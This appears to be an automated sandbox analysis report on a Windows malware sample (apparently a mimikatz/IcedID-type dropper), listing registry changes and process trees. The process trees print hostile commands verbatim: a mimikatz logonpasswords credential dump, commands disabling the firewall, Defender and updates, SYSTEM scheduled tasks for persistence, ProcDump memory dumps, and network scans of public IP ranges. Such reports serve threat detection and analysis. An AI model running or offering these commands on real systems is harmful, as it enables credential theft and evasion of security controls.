Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	lbskpuk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	lbskpuk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	lbskpuk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	lbskpuk.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2992	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1676	lbskpuk.exe
Token: SeDebugPrivilege	3068	lbskpuk.exe
Token: SeDebugPrivilege	1992	vfshost.exe
Token: SeDebugPrivilege	2468	phqiqqbrk.exe
Token: SeLockMemoryPrivilege	4332	kgtuib.exe
Token: SeLockMemoryPrivilege	4332	kgtuib.exe
Token: SeDebugPrivilege	3556	phqiqqbrk.exe
Token: SeDebugPrivilege	628	phqiqqbrk.exe
Token: SeDebugPrivilege	792	phqiqqbrk.exe
Token: SeDebugPrivilege	5232	phqiqqbrk.exe
Token: SeDebugPrivilege	5460	phqiqqbrk.exe
Token: SeDebugPrivilege	3488	phqiqqbrk.exe
Token: SeDebugPrivilege	5812	phqiqqbrk.exe
Token: SeDebugPrivilege	5756	phqiqqbrk.exe
Token: SeDebugPrivilege	6056	phqiqqbrk.exe
Token: SeDebugPrivilege	1960	phqiqqbrk.exe
Token: SeDebugPrivilege	4364	phqiqqbrk.exe
Token: SeDebugPrivilege	3780	phqiqqbrk.exe
Token: SeDebugPrivilege	5848	phqiqqbrk.exe
Token: SeDebugPrivilege	380	phqiqqbrk.exe
Token: SeDebugPrivilege	940	phqiqqbrk.exe
Token: SeDebugPrivilege	5160	phqiqqbrk.exe
Token: SeDebugPrivilege	900	phqiqqbrk.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
1676	lbskpuk.exe
1676	lbskpuk.exe
3068	lbskpuk.exe
3068	lbskpuk.exe
2184	xohudmc.exe
532	zebhau.exe
5460	lbskpuk.exe
5460	lbskpuk.exe
3476	lbskpuk.exe
3476	lbskpuk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3124 wrote to memory of 3640	3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe	84
PID 3124 wrote to memory of 3640	3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe	84
PID 3124 wrote to memory of 3640	3124	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe	84
PID 3640 wrote to memory of 2992	3640	cmd.exe	86
PID 3640 wrote to memory of 2992	3640	cmd.exe	86
PID 3640 wrote to memory of 2992	3640	cmd.exe	86
PID 3640 wrote to memory of 1676	3640	cmd.exe	90
PID 3640 wrote to memory of 1676	3640	cmd.exe	90
PID 3640 wrote to memory of 1676	3640	cmd.exe	90
PID 3068 wrote to memory of 228	3068	lbskpuk.exe	92
PID 3068 wrote to memory of 228	3068	lbskpuk.exe	92
PID 3068 wrote to memory of 228	3068	lbskpuk.exe	92
PID 228 wrote to memory of 4024	228	cmd.exe	94
PID 228 wrote to memory of 4024	228	cmd.exe	94
PID 228 wrote to memory of 4024	228	cmd.exe	94
PID 228 wrote to memory of 3944	228	cmd.exe	95
PID 228 wrote to memory of 3944	228	cmd.exe	95
PID 228 wrote to memory of 3944	228	cmd.exe	95
PID 228 wrote to memory of 3104	228	cmd.exe	96
PID 228 wrote to memory of 3104	228	cmd.exe	96
PID 228 wrote to memory of 3104	228	cmd.exe	96
PID 228 wrote to memory of 1628	228	cmd.exe	97
PID 228 wrote to memory of 1628	228	cmd.exe	97
PID 228 wrote to memory of 1628	228	cmd.exe	97
PID 228 wrote to memory of 2400	228	cmd.exe	98
PID 228 wrote to memory of 2400	228	cmd.exe	98
PID 228 wrote to memory of 2400	228	cmd.exe	98
PID 228 wrote to memory of 924	228	cmd.exe	99
PID 228 wrote to memory of 924	228	cmd.exe	99
PID 228 wrote to memory of 924	228	cmd.exe	99
PID 3068 wrote to memory of 856	3068	lbskpuk.exe	102
PID 3068 wrote to memory of 856	3068	lbskpuk.exe	102
PID 3068 wrote to memory of 856	3068	lbskpuk.exe	102
PID 3068 wrote to memory of 4944	3068	lbskpuk.exe	104
PID 3068 wrote to memory of 4944	3068	lbskpuk.exe	104
PID 3068 wrote to memory of 4944	3068	lbskpuk.exe	104
PID 3068 wrote to memory of 944	3068	lbskpuk.exe	106
PID 3068 wrote to memory of 944	3068	lbskpuk.exe	106
PID 3068 wrote to memory of 944	3068	lbskpuk.exe	106
PID 3068 wrote to memory of 3872	3068	lbskpuk.exe	113
PID 3068 wrote to memory of 3872	3068	lbskpuk.exe	113
PID 3068 wrote to memory of 3872	3068	lbskpuk.exe	113
PID 3872 wrote to memory of 1556	3872	cmd.exe	115
PID 3872 wrote to memory of 1556	3872	cmd.exe	115
PID 3872 wrote to memory of 1556	3872	cmd.exe	115
PID 1556 wrote to memory of 3624	1556	wpcap.exe	116
PID 1556 wrote to memory of 3624	1556	wpcap.exe	116
PID 1556 wrote to memory of 3624	1556	wpcap.exe	116
PID 3624 wrote to memory of 2744	3624	net.exe	118
PID 3624 wrote to memory of 2744	3624	net.exe	118
PID 3624 wrote to memory of 2744	3624	net.exe	118
PID 1556 wrote to memory of 5096	1556	wpcap.exe	119
PID 1556 wrote to memory of 5096	1556	wpcap.exe	119
PID 1556 wrote to memory of 5096	1556	wpcap.exe	119
PID 5096 wrote to memory of 4804	5096	net.exe	121
PID 5096 wrote to memory of 4804	5096	net.exe	121
PID 5096 wrote to memory of 4804	5096	net.exe	121
PID 1556 wrote to memory of 4336	1556	wpcap.exe	122
PID 1556 wrote to memory of 4336	1556	wpcap.exe	122
PID 1556 wrote to memory of 4336	1556	wpcap.exe	122
PID 4336 wrote to memory of 3248	4336	net.exe	124
PID 4336 wrote to memory of 3248	4336	net.exe	124
PID 4336 wrote to memory of 3248	4336	net.exe	124
PID 1556 wrote to memory of 2280	1556	wpcap.exe	125

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136
- C:\Windows\TEMP\erzybtpkl\kgtuib.exe
  "C:\Windows\TEMP\erzybtpkl\kgtuib.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4332

C:\Users\Admin\AppData\Local\Temp\2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uctlcnkl\lbskpuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:2992
- - C:\Windows\uctlcnkl\lbskpuk.exe
    C:\Windows\uctlcnkl\lbskpuk.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1676

C:\Windows\uctlcnkl\lbskpuk.exe
C:\Windows\uctlcnkl\lbskpuk.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:924
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:856
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:4944
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\zlitictgt\thiyltjuy\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3872
- - C:\Windows\zlitictgt\thiyltjuy\wpcap.exe
    C:\Windows\zlitictgt\thiyltjuy\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3624
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:2744
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5096
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:4804
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:3248
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:2280
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:2984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:1016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zlitictgt\thiyltjuy\Scant.txt
  2⤵
  PID:4516
- - C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe
    C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zlitictgt\thiyltjuy\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\zlitictgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zlitictgt\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2172
- - C:\Windows\zlitictgt\Corporate\vfshost.exe
    C:\Windows\zlitictgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kbiptzjfp" /ru system /tr "cmd /c C:\Windows\ime\lbskpuk.exe"
  2⤵
  PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "kbiptzjfp" /ru system /tr "cmd /c C:\Windows\ime\lbskpuk.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zcskltljl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F"
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "zcskltljl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lqbqicitb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F"
  2⤵
  PID:1188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lqbqicitb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:3324
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:2184
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:3624
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2536
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:3660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:3200
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1348
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2016
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:3784
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:1676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2800
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:924
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4312
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:2376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:208
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:3604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:3500
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:4864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4884
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:2836
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:3152
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:2752
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 808 C:\Windows\TEMP\zlitictgt\808.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2468
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2184
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 388 C:\Windows\TEMP\zlitictgt\388.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2136 C:\Windows\TEMP\zlitictgt\2136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\zlitictgt\thiyltjuy\scan.bat
  2⤵
  PID:3944
- - C:\Windows\zlitictgt\thiyltjuy\kybllnpce.exe
    kybllnpce.exe TCP 141.120.0.1 141.120.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    PID:228
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2628 C:\Windows\TEMP\zlitictgt\2628.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:792
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2816 C:\Windows\TEMP\zlitictgt\2816.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5232
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2840 C:\Windows\TEMP\zlitictgt\2840.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5460
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 1092 C:\Windows\TEMP\zlitictgt\1092.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3768 C:\Windows\TEMP\zlitictgt\3768.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5812
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3864 C:\Windows\TEMP\zlitictgt\3864.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5756
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3924 C:\Windows\TEMP\zlitictgt\3924.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6056
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4012 C:\Windows\TEMP\zlitictgt\4012.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1960
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4056 C:\Windows\TEMP\zlitictgt\4056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4364
- C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
  C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 1492 C:\Windows\TEMP\zlitictgt\1492.dmp
  2⤵
